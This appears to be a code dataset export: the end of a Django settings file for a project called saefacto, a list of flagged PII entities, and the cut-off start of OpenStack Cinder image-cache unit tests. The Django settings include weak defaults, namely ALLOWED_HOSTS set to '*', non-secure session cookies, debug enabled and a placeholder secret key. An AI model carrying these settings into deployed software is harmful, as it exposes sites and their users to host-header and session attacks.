'allauth.socialaccount.providers.github', ) + ########## END INSTALLED_APPS + + ########## SECRET KEY + SECRET_KEY = values.SecretValue() + ########## END SECRET KEY + + ########## django-secure + INSTALLED_APPS += (""djangosecure"", ) + + # set this to 60 seconds and then to 518400 when you can prove it works + SECURE_HSTS_SECONDS = 60 + SECURE_HSTS_INCLUDE_SUBDOMAINS = values.BooleanValue(True) + SECURE_FRAME_DENY = values.BooleanValue(True) + SECURE_CONTENT_TYPE_NOSNIFF = values.BooleanValue(True) + SECURE_BROWSER_XSS_FILTER = values.BooleanValue(True) + SESSION_COOKIE_SECURE = values.BooleanValue(False) + SESSION_COOKIE_HTTPONLY = values.BooleanValue(True) + SECURE_SSL_REDIRECT = values.BooleanValue(True) + ########## end django-secure + + ########## SITE CONFIGURATION + # Hosts/domain names that are valid for this site + # See https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts + ALLOWED_HOSTS = [""*""] + ########## END SITE CONFIGURATION + + INSTALLED_APPS += (""gunicorn"", ) + + ########## STORAGE CONFIGURATION + # See: http://django-storages.readthedocs.org/en/latest/index.html + INSTALLED_APPS += ( + 'storages', + ) + + # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings + STATICFILES_STORAGE = DEFAULT_FILE_STORAGE = 'storages.backends.s3boto.S3BotoStorage' + + # See: http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings + AWS_ACCESS_KEY_ID = values.SecretValue() + AWS_SECRET_ACCESS_KEY = values.SecretValue() + AWS_STORAGE_BUCKET_NAME = values.SecretValue() + AWS_AUTO_CREATE_BUCKET = True + AWS_QUERYSTRING_AUTH = False + + # see: https://github.com/antonagestam/collectfast + AWS_PRELOAD_METADATA = True + INSTALLED_APPS += (""collectfast"", ) + + # AWS cache settings, don't change unless you know what you're doing: + AWS_EXPIREY = 60 * 60 * 24 * 7 + AWS_HEADERS = { + 'Cache-Control': 'max-age=%d, s-maxage=%d, must-revalidate' % (AWS_EXPIREY, + AWS_EXPIREY) + } + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url + STATIC_URL = 'https://s3.amazonaws.com/%s/' % AWS_STORAGE_BUCKET_NAME + ########## END STORAGE CONFIGURATION + + ########## EMAIL + DEFAULT_FROM_EMAIL = values.Value( + 'saefacto dummy@email.com') + EMAIL_HOST = values.Value('smtp.sendgrid.com') + EMAIL_HOST_PASSWORD = values.SecretValue(environ_prefix="""", environ_name=""SENDGRID_PASSWORD"") + EMAIL_HOST_USER = values.SecretValue(environ_prefix="""", environ_name=""SENDGRID_USERNAME"") + EMAIL_PORT = values.IntegerValue(587, environ_prefix="""", environ_name=""EMAIL_PORT"") + EMAIL_SUBJECT_PREFIX = values.Value('[saefacto] ', environ_name=""EMAIL_SUBJECT_PREFIX"") + EMAIL_USE_TLS = True + SERVER_EMAIL = EMAIL_HOST_USER + ########## END EMAIL + + ########## TEMPLATE CONFIGURATION + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs + TEMPLATE_LOADERS = ( + ('django.template.loaders.cached.Loader', ( + 'django.template.loaders.filesystem.Loader', + 'django.template.loaders.app_directories.Loader', + )), + ) + ########## END TEMPLATE CONFIGURATION + + ########## CACHING + # Only do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows. + try: + # See: https://github.com/rdegges/django-heroku-memcacheify + from memcacheify import memcacheify + CACHES = memcacheify() + except ImportError: + CACHES = values.CacheURLValue(default=""memcached://127.0.0.1:11211"") + ########## END CACHING + + ########## Your production stuff: Below this line define 3rd party libary settings + + ########## DEBUG + DEBUG = values.BooleanValue(True) + TEMPLATE_DEBUG = DEBUG + ########## END DEBUG + ########## django-debug-toolbar + MIDDLEWARE_CLASSES = Common.MIDDLEWARE_CLASSES + ('debug_toolbar.middleware.DebugToolbarMiddleware',) + INSTALLED_APPS += ('debug_toolbar',) + + INTERNAL_IPS = ('127.0.0.1',) + + DEBUG_TOOLBAR_CONFIG = { + 'DISABLE_PANELS': ['debug_toolbar.panels.redirects.RedirectsPanel'], + 'SHOW_TEMPLATE_CONTEXT': True, + } + ########## end django-debug-toolbar + + +####################################################################################### +# hack terrivelmente feio para fazer o Pycharm identificar as bibliotecas +# o codigo abaixo nunca sera executado +if 1 == 2: + INSTALLED_APPS = ( + # Default Django apps: + 'django.contrib.auth', + 'django.contrib.contenttypes', + 'django.contrib.sessions', + 'django.contrib.sites', + 'django.contrib.messages', + 'django.contrib.staticfiles', + + # Useful template tags: + # 'django.contrib.humanize', + + # Admin + 'django.contrib.admin', + + 'south', # Database migration helpers: + 'crispy_forms', # Form layouts + 'avatar', # for user avatars + 'sitetree', + 'sitetree_smartadmin', + 'django_user_agents', + 'statici18n', # javascript + + 'users', # custom users app + 'core', + 'main', + + # Needs to come last for now because of a weird edge case between + # South and allauth + 'allauth', # registration + 'allauth.account', # registration + 'allauth.socialaccount', # registration + ) + ########## END APP CONFIGURATION + + ########## MIDDLEWARE CONFIGURATION + MIDDLEWARE_CLASSES = ( + 'django.contrib.sessions.middleware.SessionMiddleware', + 'django.middleware.common.CommonMiddleware', + 'django.middleware.csrf.CsrfViewMiddleware', + 'django.contrib.auth.middleware.AuthenticationMiddleware', + 'django.contrib.messages.middleware.MessageMiddleware', + 'django.middleware.clickjacking.XFrameOptionsMiddleware', + ) + ########## END MIDDLEWARE CONFIGURATION + + ########## DEBUG + # See: https://docs.djangoproject.com/en/dev/ref/settings/#debug + DEBUG = True + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug + TEMPLATE_DEBUG = DEBUG + ########## END DEBUG + + ########## SECRET CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key + # Note: This key only used for development and testing. + # In production, this is changed to a values.SecretValue() setting + SECRET_KEY = ""CHANGEME!!!"" + ########## END SECRET CONFIGURATION + + ########## FIXTURE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS + FIXTURE_DIRS = ( + join(BASE_DIR, 'fixtures'), + ) + ########## END FIXTURE CONFIGURATION + + ########## EMAIL CONFIGURATION + EMAIL_BACKEND = values.Value('django.core.mail.backends.smtp.EmailBackend') + ########## END EMAIL CONFIGURATION + + ########## MANAGER CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#admins + ADMINS = ( + ('Fábio C. Barrionuevo da Luz', dummy@email.com'), + ) + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#managers + MANAGERS = ADMINS + ########## END MANAGER CONFIGURATION + + ########## DATABASE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#databases + + ########## END DATABASE CONFIGURATION + + ########## CACHING + # Do this here because thanks to django-pylibmc-sasl and pylibmc memcacheify is painful to install on windows. + # memcacheify is what's used in Production + CACHES = { + 'default': { + 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache', + 'LOCATION': '' + } + } + ########## END CACHING + + ########## GENERAL CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone + TIME_ZONE = 'America/Los_Angeles' + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code + LANGUAGE_CODE = 'en-us' + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id + SITE_ID = 1 + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n + USE_I18N = True + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n + USE_L10N = True + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz + USE_TZ = True + ########## END GENERAL CONFIGURATION + + ########## TEMPLATE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors + TEMPLATE_CONTEXT_PROCESSORS = ( + 'django.contrib.auth.context_processors.auth', + ""allauth.account.context_processors.account"", + ""allauth.socialaccount.context_processors.socialaccount"", + 'django.core.context_processors.debug', + 'django.core.context_processors.i18n', + 'django.core.context_processors.media', + 'django.core.context_processors.static', + 'django.core.context_processors.tz', + 'django.contrib.messages.context_processors.messages', + 'django.core.context_processors.request', + # Your stuff: custom template context processers go here + ) + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs + TEMPLATE_DIRS = ( + join(BASE_DIR, 'templates'), + ) + + TEMPLATE_LOADERS = ( + 'django.template.loaders.filesystem.Loader', + 'django.template.loaders.app_directories.Loader', + ) + + # See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs + CRISPY_TEMPLATE_PACK = 'bootstrap3' + ########## END TEMPLATE CONFIGURATION + + ########## STATIC FILE CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root + STATIC_ROOT = join(os.path.dirname(BASE_DIR), 'staticfiles') + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url + STATIC_URL = '/static/' + + # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS + STATICFILES_DIRS = ( + join(BASE_DIR, 'static'), + ) + + # See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders + STATICFILES_FINDERS = ( + 'django.contrib.staticfiles.finders.FileSystemFinder', + 'django.contrib.staticfiles.finders.AppDirectoriesFinder', + ) + ########## END STATIC FILE CONFIGURATION + + ########## MEDIA CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root + MEDIA_ROOT = join(BASE_DIR, 'media') + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url + MEDIA_URL = '/media/' + ########## END MEDIA CONFIGURATION + + ########## URL Configuration + ROOT_URLCONF = 'config.urls' + + # See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application + WSGI_APPLICATION = 'config.wsgi.application' + ########## End URL Configuration + + ########## AUTHENTICATION CONFIGURATION + AUTHENTICATION_BACKENDS = ( + ""django.contrib.auth.backends.ModelBackend"", + ""allauth.account.auth_backends.AuthenticationBackend"", + ) + + # Some really nice defaults + ACCOUNT_AUTHENTICATION_METHOD = ""username"" + ACCOUNT_EMAIL_REQUIRED = True + ACCOUNT_EMAIL_VERIFICATION = ""mandatory"" + ########## END AUTHENTICATION CONFIGURATION + + ########## Custom user app defaults + # Select the correct user model + AUTH_USER_MODEL = ""users.User"" + LOGIN_REDIRECT_URL = ""users:redirect"" + ########## END Custom user app defaults + + ########## SLUGLIFIER + AUTOSLUG_SLUGIFY_FUNCTION = ""slugify.slugify"" + ########## END SLUGLIFIER + + ########## LOGGING CONFIGURATION + # See: https://docs.djangoproject.com/en/dev/ref/settings/#logging + # A sample logging configuration. The only tangible logging + # performed by this configuration is to send an email to + # the site admins on every HTTP 500 error when DEBUG=False. + # See http://docs.djangoproject.com/en/dev/topics/logging for + # more details on how to customize your logging configuration. + LOGGING = { + 'version': 1, + 'disable_existing_loggers': False, + 'filters': { + 'require_debug_false': { + '()': 'django.utils.log.RequireDebugFalse' + } + }, + 'handlers': { + 'mail_admins': { + 'level': 'ERROR', + 'filters': ['require_debug_false'], + 'class': 'django.utils.log.AdminEmailHandler' + } + }, + 'loggers': { + 'django.request': { + 'handlers': ['mail_admins'], + 'level': 'ERROR', + 'propagate': True, + }, + } + } + ########## END LOGGING CONFIGURATION + + + ########## Your common stuff: Below this line define 3rd party libary settings +",24139,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application'], ['IP_ADDRESS', '127.0.0.1'], ['URL', ""https://s3.amazonaws.com/%s/'""], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application'], ['PERSON', 'https://docs.djangoproject.com/en/dev/topics/settings/'], ['LOCATION', 'django.contrib.messages'], ['PERSON', 'LOCAL_APPS'], ['LOCATION', 'South'], ['PERSON', 'AuthenticationMiddleware'], ['PERSON', 'XFrameOptionsMiddleware'], ['NRP', 'SECRET_KEY'], ['PERSON', ""Fábio C. Barrionuevo da Luz'""], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'LocMemCache'], ['LOCATION', 'CRISPY_TEMPLATE_PACK'], ['PERSON', 'MEDIA_ROOT'], ['URL', 'config.ws'], ['PERSON', 'EMAIL_PORT'], ['LOCATION', 'projetosgt'], ['PERSON', 'sae_db'], ['PERSON', 'INTERCEPT_REDIRECTS'], ['PERSON', 'SITETREE_MODEL_TREE_ITEM'], ['PERSON', 'SmartTreeItem'], ['NRP', 'SECRET_KEY'], ['DATE_TIME', 'this to 60 seconds'], ['NRP', 'SECURE_CONTENT_TYPE_NOSNIFF'], ['LOCATION', 'AWS_SECRET_ACCESS_KEY'], ['PERSON', 'AWS_STORAGE_BUCKET_NAME'], ['LOCATION', 'https://s3.amazonaws.com/%s/'], ['PERSON', 'EMAIL_PORT'], ['PERSON', 'SERVER_EMAIL = EMAIL_HOST_USER'], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'terrivelmente feio para fazer o Pycharm'], ['LOCATION', 'django.contrib.messages'], ['LOCATION', 'South'], ['PERSON', 'AuthenticationMiddleware'], ['PERSON', 'XFrameOptionsMiddleware'], ['NRP', 'SECRET_KEY'], ['PERSON', ""Fábio C. Barrionuevo da Luz'""], ['PERSON', 'pylibmc memcacheify'], ['PERSON', 'LocMemCache'], ['LOCATION', 'CRISPY_TEMPLATE_PACK'], ['PERSON', 'MEDIA_ROOT'], ['URL', 'config.ws'], ['URL', 'https://docs.djangoproject.com/en/dev/topics/settings/'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#secret-key'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#admins'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#managers'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#time-zone'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#language-code'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#site-id'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-tz'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#logging'], ['URL', 'http://docs.djangoproject.com/en/dev/topics/logging'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 'https://docs.djangoproject.com/en/1.6/ref/settings/#allowed-hosts'], ['URL', 'http://django-storages.readthedocs.org/en/latest/index.html'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'http://django-storages.readthedocs.org/en/latest/backends/amazon-S3.html#settings'], ['URL', 'https://github.com/antonagestam/collectfast'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'https://github.com/rdegges/django-heroku-memcacheify'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-debug'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#secret-key'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#admins'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#managers'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#databases'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#time-zone'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#language-code'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#site-id'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#use-tz'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs'], ['URL', 'http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#static-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-root'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#media-url'], ['URL', 'https://docs.djangoproject.com/en/dev/ref/settings/#logging'], ['URL', 'http://docs.djangoproject.com/en/dev/topics/logging'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'CallingFormat.SU'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'django.contrib.au'], ['URL', 'django.contrib.co'], ['URL', 'django.contrib.se'], ['URL', 'django.contrib.si'], ['URL', 'django.contrib.me'], ['URL', 'django.contrib.st'], ['URL', 'django.contrib.hu'], ['URL', 'django.contrib.ad'], ['URL', 'django.contrib.ad'], ['URL', 'allauth.ac'], ['URL', 'allauth.so'], ['URL', 'django.contrib.sessions.middleware.Se'], ['URL', 'django.middleware.common.Com'], ['URL', 'django.contrib.auth.middleware.Au'], ['URL', 'django.contrib.messages.middleware.Me'], ['URL', 'django.middleware.cl'], ['URL', 'agents.middleware.Us'], ['URL', 'values.Bo'], ['URL', 'values.Se'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.sm'], ['URL', 'email.com'], ['URL', 'django.core.cache.ba'], ['URL', 'django.contrib.auth.co'], ['URL', 'processors.au'], ['URL', 'allauth.account.co'], ['URL', 'processors.ac'], ['URL', 'allauth.socialaccount.co'], ['URL', 'processors.so'], ['URL', 'django.core.co'], ['URL', 'processors.de'], ['URL', 'django.core.co'], ['URL', 'django.core.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.st'], ['URL', 'django.core.co'], ['URL', 'processors.tz'], ['URL', 'django.contrib.messages.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.re'], ['URL', 'django.template.loaders.fi'], ['URL', 'os.pa'], ['URL', 'django.contrib.staticfiles.finders.Fi'], ['URL', 'django.contrib.staticfiles.fi'], ['URL', 'django.contrib.auth.backends.Mo'], ['URL', 'allauth.account.au'], ['URL', 'backends.Au'], ['URL', 'users.Us'], ['URL', 'slugify.sl'], ['URL', 'django.utils.log.Re'], ['URL', 'django.utils.log.Ad'], ['URL', 'django.re'], ['URL', 'values.Bo'], ['URL', 'Common.IN'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.co'], ['URL', 'toolbar.middleware.De'], ['URL', 'smartadmin.Sm'], ['URL', 'smartadmin.Sm'], ['URL', 'Common.IN'], ['URL', 'allauth.socialaccount.pro'], ['URL', 'allauth.socialaccount.providers.gi'], ['URL', 'values.Se'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'values.Bo'], ['URL', 'storages.ba'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 'values.Va'], ['URL', 'email.com'], ['URL', 'values.Va'], ['URL', 'smtp.sendgrid.com'], ['URL', 'values.Se'], ['URL', 'values.Se'], ['URL', 'values.Int'], ['URL', 'values.Va'], ['URL', 'django.template.loaders.ca'], ['URL', 'django.template.loaders.fi'], ['URL', 'values.Ca'], ['URL', 'values.Bo'], ['URL', 'toolbar.middleware.De'], ['URL', 'toolbar.panels.redirects.Red'], ['URL', 'django.contrib.au'], ['URL', 'django.contrib.co'], ['URL', 'django.contrib.se'], ['URL', 'django.contrib.si'], ['URL', 'django.contrib.me'], ['URL', 'django.contrib.st'], ['URL', 'django.contrib.hu'], ['URL', 'django.contrib.ad'], ['URL', 'allauth.ac'], ['URL', 'allauth.so'], ['URL', 'django.contrib.sessions.middleware.Se'], ['URL', 'django.middleware.common.Com'], ['URL', 'django.contrib.auth.middleware.Au'], ['URL', 'django.contrib.messages.middleware.Me'], ['URL', 'django.middleware.cl'], ['URL', 'values.Se'], ['URL', 'values.Va'], ['URL', 'django.core.mail.backends.sm'], ['URL', 'email.com'], ['URL', 'django.core.cache.ba'], ['URL', 'django.contrib.auth.co'], ['URL', 'processors.au'], ['URL', 'allauth.account.co'], ['URL', 'processors.ac'], ['URL', 'allauth.socialaccount.co'], ['URL', 'processors.so'], ['URL', 'django.core.co'], ['URL', 'processors.de'], ['URL', 'django.core.co'], ['URL', 'django.core.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.st'], ['URL', 'django.core.co'], ['URL', 'processors.tz'], ['URL', 'django.contrib.messages.co'], ['URL', 'processors.me'], ['URL', 'django.core.co'], ['URL', 'processors.re'], ['URL', 'django.template.loaders.fi'], ['URL', 'os.pa'], ['URL', 'django.contrib.staticfiles.finders.Fi'], ['URL', 'django.contrib.staticfiles.fi'], ['URL', 'django.contrib.auth.backends.Mo'], ['URL', 'allauth.account.au'], ['URL', 'backends.Au'], ['URL', 'users.Us'], ['URL', 'slugify.sl'], ['URL', 'django.utils.log.Re'], ['URL', 'django.utils.log.Ad'], ['URL', 'django.re']]" +72,"# Copyright (C) 2015 Pure Storage, Inc. +# +# Licensed under the Apache License, Version 2.0 (the ""License""); you may +# not use this file except in compliance with the License. You may obtain +# a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an ""AS IS"" BASIS, WITHOUT +# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the +# License for the specific language governing permissions and limitations +# under the License. + +from datetime import timedelta +import ddt +import mock + +from oslo_utils import timeutils + +from cinder import context as ctxt +from cinder.db.sqlalchemy import models +from cinder.image import cache as image_cache +from cinder import objects +from cinder import test +from cinder.tests.unit import fake_constants as fake + + +@ddt.ddt +class ImageVolumeCacheTestCase(test.TestCase): + + def setUp(self): + super(ImageVolumeCacheTestCase, self).setUp() + self.mock_db = mock.Mock() + self.mock_volume_api = mock.Mock() + self.context = ctxt.get_admin_context() + self.volume = models.Volume() + vol_params = {'id': fake.VOLUME_ID, + 'host': 'foo@bar#whatever', + 'cluster_name': 'cluster', + 'size': 0} + self.volume.update(vol_params) + self.volume_ovo = objects.Volume(self.context, **vol_params) + + def _build_cache(self, max_gb=0, max_count=0): + cache = image_cache.ImageVolumeCache(self.mock_db, + self.mock_volume_api, + max_gb, + max_count) + cache.notifier = self.notifier + return cache + + def _build_entry(self, size=10): + entry = { + 'id': 1, + 'host': 'test@foo#bar', + 'cluster_name': 'cluster@foo#bar', + 'image_id': 'PI:KEY', + 'image_updated_at': timeutils.utcnow(with_timezone=True), + 'volume_id': '70a599e0-31e7-49b7-b260-868f441e862b', + 'size': size, + 'last_used': timeutils.utcnow(with_timezone=True) + } + return entry + + def test_get_by_image_volume(self): + cache = self._build_cache() + ret = {'id': 1} + volume_id = '70a599e0-31e7-49b7-b260-868f441e862b' + self.mock_db.image_volume_cache_get_by_volume_id.return_value = ret + entry = cache.get_by_image_volume(self.context, volume_id) + self.assertEqual(ret, entry) + + self.mock_db.image_volume_cache_get_by_volume_id.return_value = None + entry = cache.get_by_image_volume(self.context, volume_id) + self.assertIsNone(entry) + + def test_evict(self): + cache = self._build_cache() + entry = self._build_entry() + cache.evict(self.context, entry) + self.mock_db.image_volume_cache_delete.assert_called_once_with( + self.context, + entry['volume_id'] + ) + + msg = self.notifier.notifications[0] + self.assertEqual('image_volume_cache.evict', msg['event_type']) + self.assertEqual('INFO', msg['priority']) + self.assertEqual(entry['host'], msg['payload']['host']) + self.assertEqual(entry['image_id'], msg['payload']['image_id']) + self.assertEqual(1, len(self.notifier.notifications)) + + @ddt.data(True, False) + def test_get_entry(self, clustered): + cache = self._build_cache() + entry = self._build_entry() + image_meta = { + 'is_public': True, + 'owner': '70a599e0-31e7-49b7-b260-868f441e862b', + 'properties': { + 'virtual_size': '1.7' + }, + 'updated_at': entry['image_updated_at'] + } + (self.mock_db. + image_volume_cache_get_and_update_last_used.return_value) = entry + if not clustered: + self.volume_ovo.cluster_name = None + expect = {'host': self.volume.host} + else: + expect = {'cluster_name': self.volume.cluster_name} + found_entry = cache.get_entry(self.context, + self.volume_ovo, + entry['image_id'], + image_meta) + self.assertDictEqual(entry, found_entry) + (self.mock_db. + image_volume_cache_get_and_update_last_used.assert_called_once_with)( + self.context, + entry['image_id'], + **expect + ) + + msg = self.notifier.notifications[0] + self.assertEqual('image_volume_cache.hit', msg['event_type']) + self.assertEqual('INFO', msg['priority']) + self.assertEqual(entry['host'], msg['payload']['host']) + self.assertEqual(entry['image_id'], msg['payload']['image_id']) + self.assertEqual(1, len(self.notifier.notifications)) + + def test_get_entry_not_exists(self): + cache = self._build_cache() + image_meta = { + 'is_public': True, + 'owner': '70a599e0-31e7-49b7-b260-868f441e862b', + 'properties': { + 'virtual_size': '1.7' + }, + 'updated_at': timeutils.utcnow(with_timezone=True) + } + image_id = 'PI:KEY' + (self.mock_db. + image_volume_cache_get_and_update_last_used.return_value) = None + + found_entry = cache.get_entry(self.context, + self.volume_ovo, + image_id, + image_meta) + + self.assertIsNone(found_entry) + + msg = self.notifier.notifications[0] + self.assertEqual('image_volume_cache.miss', msg['event_type']) + self.assertEqual('INFO', msg['priority']) + self.assertEqual(self.volume.host, msg['payload']['host']) + self.assertEqual(image_id, msg['payload']['image_id']) + self.assertEqual(1, len(self.notifier.notifications)) + + @mock.patch('cinder.objects.Volume.get_by_id') + def test_get_entry_needs_update(self, mock_volume_by_id): + cache = self._build_cache() + entry = self._build_entry() + image_meta = { + 'is_public': True, + 'owner': '70a599e0-31e7-49b7-b260-868f441e862b', + 'properties': { + 'virtual_size': '1.7' + }, + 'updated_at': entry['image_updated_at'] + timedelta(hours=2) + } + (self.mock_db. + image_volume_cache_get_and_update_last_used.return_value) = entry + + mock_volume = mock.MagicMock() + mock_volume_by_id.return_value = mock_volume + + found_entry = cache.get_entry(self.context, + self.volume_ovo, + entry['image_id'], + image_meta) + + # Expect that the cache entry is not returned and the image-volume + # for it is deleted. + self.assertIsNone(found_entry) + self.mock_volume_api.delete.assert_called_with(self.context, + mock_volume) + msg = self.notifier.notifications[0] + self.assertEqual('image_volume_cache.miss', msg['event_type']) + self.assertEqual('INFO', msg['priority']) + self.assertEqual(self.volume.host, msg['payload']['host']) + self.assertEqual(entry['image_id'], msg['payload']['image_id']) + self.assertEqual(1, len(self.notifier.notifications)) + + def test_create_cache_entry(self): + cache = self._build_cache() + entry = self._build_entry() + image_meta = { + 'updated_at': entry['image_updated_at'] + } + self.mock_db.image_volume_cache_create.return_value = entry + created_entry = cache.create_cache_entry(self.context, + self.volume_ovo, + entry['image_id'], + image_meta) + self.assertEqual(entry, created_entry) + self.mock_db.image_volume_cache_create.assert_called_once_with( + self.context, + self.volume_ovo.host, + self.volume_ovo.cluster_name, + entry['image_id'], + entry['image_updated_at'].replace(tzinfo=None), + self.volume_ovo.id, + self.volume_ovo.size + ) + + def test_ensure_space_unlimited(self): + cache = self._build_cache(max_gb=0, max_count=0) + has_space = cache.ensure_space(self.context, self.volume) + self.assertTrue(has_space) + + self.volume.size = 500 + has_space = cache.ensure_space(self.context, self.volume) + self.assertTrue(has_space) + + def test_ensure_space_no_entries(self): + cache = self._build_cache(max_gb=100, max_count=10) + self.mock_db.image_volume_cache_get_all.return_value = [] + + self.volume_ovo.size = 5 + has_space = cache.ensure_space(self.context, self.volume_ovo) + self.assertTrue(has_space) + + self.volume_ovo.size = 101 + has_space = cache.ensure_space(self.context, self.volume_ovo) + self.assertFalse(has_space) + + def test_ensure_space_need_gb(self): + cache = self._build_cache(max_gb=30, max_count=10) + mock_delete = mock.patch.object(cache, '_delete_image_volume').start() + + entries = [] + entry1 = self._build_entry(size=12) + entries.append(entry1) + entry2 = self._build_entry(size=5) + entries.append(entry2) + entry3 = self._build_entry(size=10) + entries.append(entry3) + self.mock_db.image_volume_cache_get_all.return_value = entries + + self.volume_ovo.size = 15 + has_space = 